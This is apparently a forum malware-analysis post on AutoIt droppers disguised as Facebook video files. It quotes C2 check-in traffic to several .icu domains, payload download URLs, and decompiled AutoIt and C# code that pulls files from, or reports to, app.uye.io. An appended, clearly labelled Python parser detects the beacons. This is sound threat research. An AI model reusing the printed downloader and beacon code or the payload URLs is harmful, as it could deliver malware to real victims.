Saw it yesterday spreading on Facebook groups with random names and packed into .bz archives.
I got 2 samples from that (they are in the attachment):
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff - 989.0 KB
It's a compiled AutoIt script; it looks like it's interacting with chrome.exe (shuts it down, reopens it), but I can not exactly replicate the behavior, it seems to have a few bugs. :|
The script is obfuscated too, which does not really help.
Files have a bit of network activity:
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478:
```http
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: C:\
ScriptName: play_12907320.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: Yes
Accept: */*
Host: fusu.icu
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:12:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=dd82fe00871874ea7410c9eac913fd5d31556410323; expires=Mon, 27-Apr-20 00:12:03 GMT; path=/; domain=.fusu.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://fusu.icu/app/7za.exe?id=3243
zip : http://fusu.icu/app/files.7z?id=3775
Server: cloudflare
CF-RAY: 4ce4d28c6c3da8db-CDG
```
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff:
```http
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: Monitoring - API Monitor v2 32-bit (Administrator)
ScriptName: play_67487566.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: No
Accept: */*
Host: keke.icu
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:53:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=d44b26fd3c0765f3f834515909abca53f1556412782; expires=Mon, 27-Apr-20 00:53:02 GMT; path=/; domain=.keke.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://keke.icu/app/7za.exe?id=6986
zip : http://keke.icu/app/files.7z?id=8734
Server: cloudflare
CF-RAY: 4ce50e947c00b75f-CDG
```
Looking closer at keke.icu, I found it hosts a few landings, including:
> HTXP: //keke.icu/download.php
which leaks a path ("Notice: Undefined variable: id in /var/www/letask.me/site/download.php") and also leads to a malware download.
So I end up with 3 domains:
- fusu.icu
- keke.icu
- letask.me
A kind of URL shortener service; screenshot of the main page:
About the file from the landing page, it's retrieved from Amazon cloud.
```javascript
a.href = "https://s3-us-west-2.amazonaws.com/dataval/FBVideo.exe";
```
37f0c2bb29eaa07cb5c8649871062afe3c261caaf76c7b52d49b04a97a7262e8 - 963.5 KB - VxVault (pulled today)
This one is a year old; it's also in AutoIt, but this time the code isn't obfuscated.
It appears to be a downloader for a miner:
```autoit
; Fetches the drop list from the server; note the same "Miner" User-Agent as the C# sample below.
; createappfolder(), downloadfile() and copyself() are helpers not included in the post.
Func getconfig()
    $xhr = ObjCreate("winhttp.winhttprequest.5.1")
    $xhr.open("GET", "https://app.uye.io/miner/config.php", False)
    $xhr.setrequestheader("User-Agent", "Miner")
    $xhr.send()
    $return = $xhr.responsetext
    If $return = "denied" Then Exit ; server-side gate: no payload for this client
    createappfolder()
    ; the response is a '#'-separated list of URLs (_StringExplode comes from String.au3)
    $data = _stringexplode($return, "#", 0)
    For $file In $data
        downloadfile($file)
    Next
    copyself()
EndFunc
```
So I did a few searches on Google about "app.uye.io" and found this:
0bbe48aca7dfb0bb2d95e6f5e4c16562c674087552b5a16f3c8af4eb25aa6f12 - Detect.exe - 5.0 KB !
This time we have C#:
```csharp
using System;
using System.Net;
using System.Reflection;
using Microsoft.VisualBasic.CompilerServices; // ProjectData calls are what the VB.NET compiler emits for error handling

internal sealed class Detect
{
    // Methods
    [STAThread]
    public static void Main()
    {
        string location = Assembly.GetExecutingAssembly().Location;
        string str2 = "denied";
        try
        {
            using (WebClient client = new WebClient())
            {
                // Same "Miner" User-Agent as the AutoIt sample; reports its own on-disk path to the server
                client.Headers[HttpRequestHeader.UserAgent] = "Miner";
                str2 = client.DownloadString("https://app.uye.io/miner/boxlog.php?path=" + location);
            }
        }
        catch (Exception exception1)
        {
            // Any network error is swallowed silently
            ProjectData.SetProjectError(exception1);
            Exception exception = exception1;
            ProjectData.ClearProjectError();
        }
    }
}
```
Very similar code, maybe a test, no idea.
A few older AutoIt samples that contact app.uye.io (also found with Google):
Video.92894831.mp4.exe - 5e455b9ee3b744c6fa036a2dca24573145a90524ab7b63ebc264fe133d2ff675 - 950.5 KB
Video.50086893.mp4.exe - 8251159756f1f33d65b3730e004b389c7778a299cbcfed86992816d7118c55d1 - 954.5 KB
Video.64931686.mp4.exe - fbad55d6119236b4cc136b67eff538afaee6c522f6bc1cb6416eb29d7381ae6c - 998.0 KB
Video.86693317.mp4.exe - c8ac7f28b6aa16368bd07ab521c648aeecddaf98fe1a0a148ae9a7162c2c0075 - 950.5 KB
The CyRadar guys saw it in December 2017, but spreading in Messenger: https://translate.google.fr/translate?s ... 7881941%2F
About the newest samples, check this write-up by VSM: https://translate.google.fr/translate?s ... &sandbox=1
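A defender-side parser for the check-in traffic quoted above, added here as an example and not code from the post or from the samples. The request and response body are constructed to match the capture's format; the User-Agent values, paths and bespoke header names it keys on are the ones visible in the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the capture quoted in the post (not a live record).
SAMPLE_REQUEST = (
    "HEAD /app/login.php HTTP/1.1\r\n"
    "User-Agent: Unzip\r\n"
    "Window: C:\\\r\n"
    "ScriptName: play_12907320.mp4.com.exe\r\n"
    "OS: WIN_XP\r\n"
    "CPU: X64\r\n"
    "Installed: Yes\r\n"
    "Accept: */*\r\n"
    "Host: fusu.icu\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)
SAMPLE_RESPONSE_BODY = (
    "unzip : http://fusu.icu/app/7za.exe?id=3243\n"
    "zip : http://fusu.icu/app/files.7z?id=3775\n"
)

BEACON_UAS = {"Unzip", "Miner"}  # UAs seen in the AutoIt and C# samples
BEACON_PATHS = ("/app/login.php", "/miner/config.php", "/miner/boxlog.php")

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers dict with lowercased names)."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers

def is_checkin(raw):
    """True when the request matches the downloader's check-in pattern."""
    method, path, h = parse_request(raw)
    ua_hit = h.get("user-agent") in BEACON_UAS
    # The AutoIt build sends host-fingerprint fields as bespoke headers.
    custom_hit = {"scriptname", "installed", "window"} <= set(h)
    return ua_hit and (path in BEACON_PATHS or custom_hit)

def payload_urls(body):
    """Extract the 'unzip : URL' / 'zip : URL' lines the server answers with."""
    return dict(re.findall(r"^(unzip|zip)\s*:\s*(\S+)", body, re.M))

def iocs(raw_request, body):
    """Collect hostnames worth blocking from the request and the served URLs."""
    _, _, h = parse_request(raw_request)
    hosts = {h.get("host", "")}
    hosts |= {urlparse(u).hostname for u in payload_urls(body).values()}
    return sorted(x for x in hosts if x)
```

Run over proxy or sandbox HTTP captures, `is_checkin` flags the beacon and `iocs` yields the download hosts to block.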